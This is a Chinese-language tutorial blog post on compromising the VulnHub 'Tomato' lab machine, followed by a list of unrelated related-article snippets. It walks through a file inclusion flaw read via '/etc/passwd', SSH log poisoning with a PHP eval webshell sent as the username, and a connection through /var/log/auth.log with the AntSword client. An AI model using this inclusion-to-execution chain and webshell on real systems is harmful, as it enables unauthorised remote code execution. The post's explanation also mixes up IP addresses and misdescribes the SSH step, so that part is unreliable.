VulnHub-Tomato靶机渗透教程 简单易懂 报错链接

news/2024/11/9 9:26:40/

Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。

环境准备

攻击机(Kali Linux)IP:192.168.252.134 

目标机 IP:192.168.252.133 

这里我两台虚拟机都是NAT模式 

渗透步骤

1.端口扫描

这里我没用kali自带的 我用的物理机上的端口扫描 结果一样 

扫出来发现几个特殊的端口 

因为2211 端口后面对应着SSH服务  所以这里试着去访问了下8888端口 出来了登录弹窗

2.目录扫描

接着 扫描下目录看看怎么个事 

dirb http://192.168.252.133

试着去访问下 antibot_image 发现下面有个info.php

进去该网页 查看源代码 发现存在文件包含漏洞 

3.文件包含漏洞

在URL后面输入 ?image=/etc/passwd (用image参数传入想要获取的文件路径)

成功显示,说明存在文件包含漏洞

4.报错链接注入木马

ssh '<?php @eval($_POST[1]);?>'@192.168.252.133 -p 2211
  1. 字符串格式:

    • '<?php @eval($_POST[1]);?>' 这部分是一个PHP代码字符串,它被直接放置在SSH命令中。这段PHP代码的功能是从$_POST[1]获取数据,并尝试执行它作为PHP代码(@eval)。这通常被用于远程代码执行攻击场景中,允许攻击者通过网络发送任意PHP代码并执行。
  2. SSH 命令:

    • ssh 是一个命令行工具,用于通过网络建立安全的Shell会话。
    • '<?php @eval($_POST[1]);?>'@192.168.47.140 这里把前面的PHP代码字符串当作用户名来使用,这是不正确的,因为SSH中的用户名应当是实际的用户账户名,而不是这样的代码。
    • -p 2211 指定SSH连接使用的端口为2211,而非默认的22端口。
    • 192.168.47.140 是试图连接的远程服务器的IP地址。

综上所述,这个命令试图将一段恶意的PHP代码作为用户名的一部分传递给SSH命令,这在正常情况下是不会工作的,因为SSH并不接受或处理PHP代码。会将我们的一句话木马带到Linux 的日志文件中。

然后在网页端查看ubuntu报错信息:/var/log/auth.log

在这个文件中,你可以找到关于登录尝试、密码更改、权限变更等事件的信息。例如,当有用户通过 SSH 登录服务器时,无论成功还是失败,都会在 /var/log/auth.log 中记录相应的消息。

4.蚁剑链接

使用中国蚁剑进行连接

上传了一句话木马的路径:http://192.168.252.133/antibot_image/antibots/info.php?image=/var/log/auth.log

连接密码是刚刚POST传入的:1


http://www.ppmy.cn/news/1503522.html

相关文章

你了解渗透测试吗?渗透测试在网络安全行业属于食物链什么层级?

可能大家对于行业存在食物链这一说法&#xff0c;印象最深的往往是编制行业&#xff0c;所谓的等级主义在那里确实更为明显。但实际上&#xff0c;各行各业都或多或少存在这种层级结构&#xff0c;网络安全领域也不例外&#xff0c;毕竟都是一些所谓的“人情世故”。那么就网络…

【C语言】数据类型全解析:编程效率提升的秘诀

目录 C语言数据类型详解1. 基本数据类型1.1 整型示例代码输出结果 1.2 浮点型示例代码输出结果 1.3 字符型示例代码输出结果 2. 派生数据类型2.1 数组示例代码输出结果 2.2 指针示例代码输出结果 2.3 结构体示例代码输出结果 2.4 共用体示例代码输出结果 3. 类型限定符3.1 cons…

无人机之海事执法篇

无人机技术已经在多个领域得到广泛应用&#xff0c;在海事执法领域&#xff0c;无人机的应用正逐渐成为一种重要的手段&#xff0c;为保障海上安全和秩序发挥着关键作用。 一、海上巡逻与监视 无人机可以覆盖广阔的海域&#xff0c;进行实时的空中巡逻和监视。它们能够快速响应…

python coding时遇到的问题

Q&#xff1a;只有cpu的时候加载模型 A&#xff1a;checkpoint torch.load(model_path, map_locationtorch.device(‘cpu’)) Q&#xff1a;vscode的文件路径和spyder的不一样 A&#xff1a;在vscode中&#xff0c;右键要用的文件&#xff0c;选择“文件相对路径”

【python案例】基于Python 爬虫的房地产数据可视化分析设计与实现

引言 研究背景与意义 房地产行业在我国属于支柱性产业&#xff0c;在我国社会经济发展中一直扮演着重要角色。房价问题&#xff0c;尤其是大中城市的房价问题&#xff0c;一直是政府、大众和众多研究人员关注的热点。如何科学地预测房价是房价问题的研究方向之一。随着互联网…

Python标准库itertools模块

itertools.chain itertools.chain 是 Python 标准库 itertools 模块中的一个函数&#xff0c;用于将多个可迭代对象&#xff08;如列表、元组、集合等&#xff09;连接成一个单一的可迭代对象。这在需要在一个循环中处理多个序列时特别有用&#xff0c;而不需要先将它们连接成…

【.NET 8 实战--孢子记账--从单体到微服务】--编写服务端框架

框架是一个项目所必须的&#xff0c;是一组预先编写的代码库和工具&#xff0c;提供了一个可以复用的结构&#xff0c;以帮助开发者快速构建应用程。即使项目目前是一个单体应用&#xff0c;我们还是需要先设计框架的&#xff0c;但是我们不可能在项目的初期就编写出一个完美的…

45.二维数组练习:计算季度营业额和年总营业额

/* 某商场每个季度营业额如下,单位&#xff1a;万元 第一季度&#xff1a;22&#xff0c;66&#xff0c;44 第二季度&#xff1a;77&#xff0c;33&#xff0c;88 第三季度&#xff1a;25&#xff0c;45&#xff0c;65 第四季度&#xff1a;11&#xff0c;66&#xff0c;99 要求…